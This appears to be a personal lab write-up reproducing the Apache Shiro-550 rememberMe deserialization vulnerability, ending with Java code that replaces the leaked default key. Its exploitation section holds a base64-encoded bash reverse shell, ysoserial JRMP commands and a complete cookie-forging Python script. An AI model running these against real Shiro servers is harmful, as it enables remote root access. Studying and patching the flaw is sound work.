Preface

Recently, while sorting out my notes, I happened to come across the Shiro deserialization vulnerability I encountered during my internship. In the spirit of reviewing the old to learn something new, I studied my predecessors' articles, organized my notes, and wrote this article.

1. Introduction to Apache Shiro

Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. Using Shiro's easy-to-understand APIs, developers can quickly and easily secure any application, from the smallest mobile applications to the largest web and enterprise applications.

2. Shiro rememberMe deserialization vulnerability (Shiro-550)

2.1 Affected version

Apache Shiro <= 1.2.4

2.2 Fingerprint

The HTTP response contains a Set-Cookie header with the field rememberMe=deleteMe.

2.3 Vulnerability Principle

In Shiro <= 1.2.4, the AES key used to protect the rememberMe cookie is hardcoded in the source code. When a user ticks RememberMe and logs in successfully, Shiro serializes the user's identity, AES-encrypts it, base64-encodes the result, and stores it in the rememberMe cookie. On every later request that carries this cookie, the server base64-decodes the rememberMe value, AES-decrypts it, and deserializes the result. Because AES is a symmetric cipher (the same key both encrypts and decrypts), anyone who knows the AES key can construct a malicious rememberMe cookie value that is accepted as valid and triggers the deserialization vulnerability.

3. Vulnerability reproduction

3.1 Environment setup

// Get the docker image
docker pull medicean/vulapps:s_shiro_1

// Start the container
docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1


3.2 Preparing tools

3.2.1 Configure Maven

1. Download Maven

Maven.apache.org/download.cg…

2. Win10 Maven environment variables and IDEA Maven environment

zhuanlan.zhihu.com/p/48831465

3.2.2 Download and package the ysoserial tool

Download: github.com/frohoff/yso…

After packaging, the ysoserial jar is in the ysoserial/target directory.

git clone github.com/frohoff/yso…
cd ysoserial
mvn package -DskipTests

PS: It finally finished packaging. I didn't expect that even after switching the Maven source to Alibaba Cloud, the speed would still be a bit slow.

3.3 Vulnerability detection

The shiro_tool.jar tool is used to check whether the target Shiro instance still uses a default key.

java -jar shiro_tool.jar http://192.168.31.81:8080/

3.4 Vulnerability exploitation

3.4.1 Method 1: nc reverse shell

1. Build the reverse shell command

First, in Kali, listen on a local port with nc:

nc -lvp 4444

Encode the following bash command into the form that java.lang.Runtime.exec() can run (the base64/bash encoding shown below):

bash -i >& /dev/tcp/192.168.31.81/4444 0>&1

Result:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjgxLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}

2. Use the JRMPListener exploit module of ysoserial to listen on port 6666 and serve the reverse shell command.

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjgxLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'

3. Generate the payload with the detected AES key

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES


def encode_rememberme(command):
    # Run ysoserial's JRMPClient generator; its stdout is the serialized object
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    # PKCS#7 padding up to a whole number of AES blocks
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # Hardcoded default key of Shiro <= 1.2.4
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    # Cookie layout: base64(iv || AES-CBC ciphertext)
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print("rememberMe={0}".format(payload.decode()))

When installing Crypto with pip under Python 2 I ran into all sorts of problems, the main one being that the Crypto.Cipher module was missing and raised various errors. Googling and Baidu-ing turned up lots of frantic pip install/uninstall advice, none of which solved it, so I simply installed the Crypto module manually. That finally settled it.

ImportError: No module named Crypto.Cipher

-> Manually download the Crypto package and install it

Download: pypi.org/simple/pycr…

Error: command 'x86_64-linux-gnu-gcc' failed with exit status 1

-> Install the build dependencies

apt-get install build-essential python-dev libssl-dev libffi-dev libxml2 libxml2-dev libxslt1-dev zlib1g-dev

Use test_shiro550.py to generate the payload:

python test_shiro550.py 192.168.31.81:6666

4. Build the request with the generated rememberMe value as a forged cookie and send it.

5. Check the nc listener: the reverse shell connects back successfully.

nc receives the reverse shell, and running whoami shows that it has root privileges.

3.4.2 Method 2: Executing a command

1. Use ysoserial to generate the POC

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "echo 'test shiro-550' > /tmp/SUCCESS" > poc

2. Encrypt the payload with Shiro's default AES key

3. Capture the request with Burp Suite and resend it with the forged rememberMe cookie.

4. Check the /tmp directory on the target server and verify that the SUCCESS file has been created.

4. Summary

The root cause of Shiro-550 is that the AES key is hardcoded in the source code, so an attacker can use the leaked key to forge the rememberMe field and produce a cookie value that the server accepts, resulting in a deserialization vulnerability. Attack chain: generate gadget object => serialize => AES encryption => base64 encoding => build the rememberMe cookie value.
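The fix on the application side is to stop using the published key. Shiro 1.2.5 and later generate a random key per SecurityManager by default; the following added example (not code from the original post or from the Shiro project) shows how to configure a deployment-specific key explicitly and how to audit that the leaked default is not in use. The environment variable name SHIRO_REMEMBERME_KEY is an assumption.

```java
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.web.mgt.CookieRememberMeManager;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import java.util.Arrays;
import java.util.Base64;

public class RememberMeHardening {
    // Leaked default key of Shiro <= 1.2.4, as quoted in the article above.
    private static final byte[] DEFAULT_KEY =
        Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");

    // Builds a rememberMe manager whose cipher key comes from the environment
    // (assumed variable SHIRO_REMEMBERME_KEY, base64 of 16/24/32 random bytes),
    // so the key is never committed to source code.
    public static CookieRememberMeManager buildRememberMeManager() {
        String encoded = System.getenv("SHIRO_REMEMBERME_KEY");
        byte[] key;
        if (encoded == null || encoded.isEmpty()) {
            // No key configured: generate a fresh random key for this process.
            // rememberMe cookies then stop working after a restart, which is
            // safer than silently falling back to a shared constant.
            key = new AesCipherService().generateNewKey().getEncoded();
            System.err.println("SHIRO_REMEMBERME_KEY not set; using a per-process key");
        } else {
            key = Base64.getDecoder().decode(encoded);
        }
        if (usesDefaultKey(key)) {
            throw new IllegalStateException("refusing to start with the leaked default rememberMe key");
        }
        CookieRememberMeManager mgr = new CookieRememberMeManager();
        mgr.setCipherKey(key);
        return mgr;
    }

    public static DefaultWebSecurityManager buildSecurityManager() {
        DefaultWebSecurityManager sm = new DefaultWebSecurityManager();
        sm.setRememberMeManager(buildRememberMeManager());
        return sm;
    }

    // Audit check: true if the key equals the hardcoded default from Shiro <= 1.2.4.
    public static boolean usesDefaultKey(byte[] key) {
        return Arrays.equals(key, DEFAULT_KEY);
    }

    public static void main(String[] args) {
        CookieRememberMeManager mgr = buildRememberMeManager();
        System.out.println("default key in use: " + usesDefaultKey(mgr.getCipherKey()));
    }
}
```

Rotating the key also invalidates every rememberMe cookie issued before the rotation, which is the desired effect after an exposure.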